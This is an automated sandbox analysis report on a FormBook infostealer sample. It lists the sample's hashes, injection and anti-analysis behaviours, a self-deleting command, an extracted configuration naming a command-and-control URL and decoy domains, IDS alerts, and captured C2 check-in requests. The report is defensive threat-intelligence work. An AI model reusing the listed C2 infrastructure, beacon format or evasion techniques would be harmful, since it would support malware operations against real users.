Loading ...

Play interactive tourEdit tour

Analysis Report transferir copia_98087.exe

Overview

General Information

Sample Name:transferir copia_98087.exe
Analysis ID:356823
MD5:ca35b660415defe96fe6af4eb3a45d86
SHA1:61345b9633b50081b63b65bbf95410d265ea6ce5
SHA256:a3327c95da3017b7f9f87eeeef8ccba7373e363facad5024432b7aba20a9b832
Tags:ESPexeFormbookgeo
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • transferir copia_98087.exe (PID: 3096 cmdline: 'C:\Users\user\Desktop\transferir copia_98087.exe' MD5: CA35B660415DEFE96FE6AF4EB3A45D86)
    • transferir copia_98087.exe (PID: 5376 cmdline: C:\Users\user\Desktop\transferir copia_98087.exe MD5: CA35B660415DEFE96FE6AF4EB3A45D86)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 2576 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 4364 cmdline: /c del 'C:\Users\user\Desktop\transferir copia_98087.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.basiclablife.com/8zdn/"], "decoy": ["yourherogarden.net", "onlineharambee.net", "cerrajeriaurgencias24horas.com", "distritoforex.com", "verifyclientserverssr.com", "dandwg.com", "co2-zero.global", "joshssl.com", "meckwt.com", "theammf.com", "rawclectic.com", "gzgnetwork.com", "richmondavenuecoc.com", "nicolelyte.com", "thetinyclosetboutique.com", "llt-group.net", "seven-sky-design.com", "joganifinancialgrp.com", "elementsvapes.com", "bingent.info", "quaichshop.net", "unethicalsgsblaw.com", "matts.digital", "lexafit.com", "covidwanderings.com", "pk972.com", "fanashaadivine.com", "winharadesigns.com", "adosignite.com", "goldengatesimmigration.com", "unazampanelcuore.com", "gasexecutive.com", "sdps365.net", "worthingtonminnesota.com", "ducatsupply.com", "beijinghui1.icu", "hn-bet.com", "homeforsalesteamboat.com", "tiaozaoxinlingshou.net", "mrbils.net", "depuitycollector.com", "winningovereating.com", "usedonlyrvs.com", "verbinoz.com", "threepocketmedia.com", "lizbing.com", "fivestardogfoods.com", "edevercal.net", "irisettelment.com", "beautyphernalia.com", "terrawindglobalprotection.net", "floridaindian.com", "kidzistore.com", "kulisbet117.com", "logingatech.info", "ftdk.net", "lawwise.legal", "bruthawar.com", "lemonpublishing.com", "6781529.com", "zfxsotc.com", "shroomsdrop.com", "ahm-app.com", "finesilversmith.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x2509f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x250d92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x277c18:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x277fb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x25caa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x283cc5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x25c591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x2837b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x25cba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x283dc7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x25cd1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x283f3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x2517aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x2789ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x25b80c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x282a2c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x252522:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x279742:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x261b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x288db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x262c3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.transferir copia_98087.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.transferir copia_98087.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.transferir copia_98087.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        0.2.transferir copia_98087.exe.317996c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          1.2.transferir copia_98087.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 1.2.transferir copia_98087.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.basiclablife.com/8zdn/"], "decoy": ["yourherogarden.net", "onlineharambee.net", "cerrajeriaurgencias24horas.com", "distritoforex.com", "verifyclientserverssr.com", "dandwg.com", "co2-zero.global", "joshssl.com", "meckwt.com", "theammf.com", "rawclectic.com", "gzgnetwork.com", "richmondavenuecoc.com", "nicolelyte.com", "thetinyclosetboutique.com", "llt-group.net", "seven-sky-design.com", "joganifinancialgrp.com", "elementsvapes.com", "bingent.info", "quaichshop.net", "unethicalsgsblaw.com", "matts.digital", "lexafit.com", "covidwanderings.com", "pk972.com", "fanashaadivine.com", "winharadesigns.com", "adosignite.com", "goldengatesimmigration.com", "unazampanelcuore.com", "gasexecutive.com", "sdps365.net", "worthingtonminnesota.com", "ducatsupply.com", "beijinghui1.icu", "hn-bet.com", "homeforsalesteamboat.com", "tiaozaoxinlingshou.net", "mrbils.net", "depuitycollector.com", "winningovereating.com", "usedonlyrvs.com", "verbinoz.com", "threepocketmedia.com", "lizbing.com", "fivestardogfoods.com", "edevercal.net", "irisettelment.com", "beautyphernalia.com", "terrawindglobalprotection.net", "floridaindian.com", "kidzistore.com", "kulisbet117.com", "logingatech.info", "ftdk.net", "lawwise.legal", "bruthawar.com", "lemonpublishing.com", "6781529.com", "zfxsotc.com", "shroomsdrop.com", "ahm-app.com", "finesilversmith.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: transferir copia_98087.exeVirustotal: Detection: 22%Perma Link
            Source: transferir copia_98087.exeReversingLabs: Detection: 12%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.271460615.0000000001650000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.226723237.0000000004119000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482399403.00000000029E0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482304869.00000000029B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.481691358.0000000002510000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271138135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271410444.0000000001500000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.transferir copia_98087.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.transferir copia_98087.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.transferir copia_98087.exe.4299960.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.transferir copia_98087.exe.424a540.2.raw.unpack, type: UNPACKEDPE
            Source: 1.2.transferir copia_98087.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: transferir copia_98087.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: transferir copia_98087.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: msdt.pdbGCTL source: transferir copia_98087.exe, 00000001.00000002.272134673.0000000003720000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: transferir copia_98087.exe, 00000001.00000002.271679191.00000000019E0000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.483918470.0000000004950000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: transferir copia_98087.exe, msdt.exe
            Source: Binary string: msdt.pdb source: transferir copia_98087.exe, 00000001.00000002.272134673.0000000003720000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\transferir copia_98087.exeCode function: 4x nop then pop edi1_2_004162C2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi5_2_025262C2

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 108.62.73.206:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 108.62.73.206:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 108.62.73.206:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49705 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 18.189.205.91:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 18.189.205.91:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49709 -> 18.189.205.91:80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.basiclablife.com/8zdn/
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=SUc3155gDWt5wcoflZcZzViJ8x0waKhO+xEIOi+15/K5BoZoLZ14fR9wugBfYGntPchb&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.unazampanelcuore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=/2j9R2c14anpqf93w73dauHGA2TQKIR5Q7oZ32qrr3zEGdcNMDJzBydR7UkO3mu0OgLM&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.floridaindian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=tcuwTISCal6Za70kmDoHryScybsdFOei7/WOW4uZGfRR2kwAWg6MdyjVPec/+BbHDhr0&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.quaichshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=VcGUHpmld1zswDwg40mcNwm1CX0p/o+pgHyf/FjbYLUTXfqCXvPFwiBdk0mlGpZRYzTf&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.basiclablife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=XOXl3Nuj7M9zcIBR6B45qltQ4dmo97Szsxf/DI8gOGgyBhu8HbEkl8wbqGipvTOnLwwM&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.elementsvapes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=hIXmrhUyU1aP5+vldRGL92fa8Yv5W8V1zdDiddkx2jBPb190TW7wCmtqgCRS1U4M3bOQ&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.hn-bet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=hAX0XCk4QOcgLnZ0keH4mYw4W1HPTbDogNdlOttC2YdmEpNB6eRk1m0w/4WJXRKcYwe6&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.gasexecutive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=eGnYEUgg+wSQcZ375yCgdfFf6E1Kt+cpyPOB6e9JmwPPtBsaC8CQtumAL6bFnIfy9ObU&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.shroomsdrop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 46.23.69.44 46.23.69.44
            Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
            Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=SUc3155gDWt5wcoflZcZzViJ8x0waKhO+xEIOi+15/K5BoZoLZ14fR9wugBfYGntPchb&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.unazampanelcuore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=/2j9R2c14anpqf93w73dauHGA2TQKIR5Q7oZ32qrr3zEGdcNMDJzBydR7UkO3mu0OgLM&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.floridaindian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=tcuwTISCal6Za70kmDoHryScybsdFOei7/WOW4uZGfRR2kwAWg6MdyjVPec/+BbHDhr0&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.quaichshop.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=VcGUHpmld1zswDwg40mcNwm1CX0p/o+pgHyf/FjbYLUTXfqCXvPFwiBdk0mlGpZRYzTf&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.basiclablife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=XOXl3Nuj7M9zcIBR6B45qltQ4dmo97Szsxf/DI8gOGgyBhu8HbEkl8wbqGipvTOnLwwM&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.elementsvapes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=hIXmrhUyU1aP5+vldRGL92fa8Yv5W8V1zdDiddkx2jBPb190TW7wCmtqgCRS1U4M3bOQ&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.hn-bet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=hAX0XCk4QOcgLnZ0keH4mYw4W1HPTbDogNdlOttC2YdmEpNB6eRk1m0w/4WJXRKcYwe6&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.gasexecutive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /8zdn/?kH=eGnYEUgg+wSQcZ375yCgdfFf6E1Kt+cpyPOB6e9JmwPPtBsaC8CQtumAL6bFnIfy9ObU&Bld=UVCtYPUHlPSP HTTP/1.1Host: www.shroomsdrop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.unazampanelcuore.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Feb 2021 16:22:34 GMTContent-Type: text/htmlContent-Length: 498Connection: closeLast-Modified: Mon, 01 Dec 2014 15:09:45 GMTChimera-API-Server: api1.uk.chimera.uk2group.comX-Powered-By: Perl Dancer 1.3512Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>
            Source: explorer.exe, 00000002.00000000.257307365.000000000F6E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: transferir copia_98087.exeString found in binary or memory: http://qunect.com/download/QuNect.exe
            Source: transferir copia_98087.exeString found in binary or memory: http://qunect.com/download/QuNect.exeMOperation
            Source: transferir copia_98087.exeString found in binary or memory: http://validator.w3.org/check?uri=referer
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: transferir copia_98087.exe, 00000000.00000002.226153911.0000000001707000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comoj
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: transferir copia_98087.exe, 00000000.00000003.213165665.0000000005F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comaN
            Source: transferir copia_98087.exe, 00000000.00000003.213165665.0000000005F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn6
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, transferir copia_98087.exe, 00000000.00000003.214660820.0000000005F6E000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: transferir copia_98087.exe, 00000000.00000003.214660820.0000000005F6E000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn?
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: transferir copia_98087.exe, 00000000.00000002.229215594.0000000006050000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.253052564.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
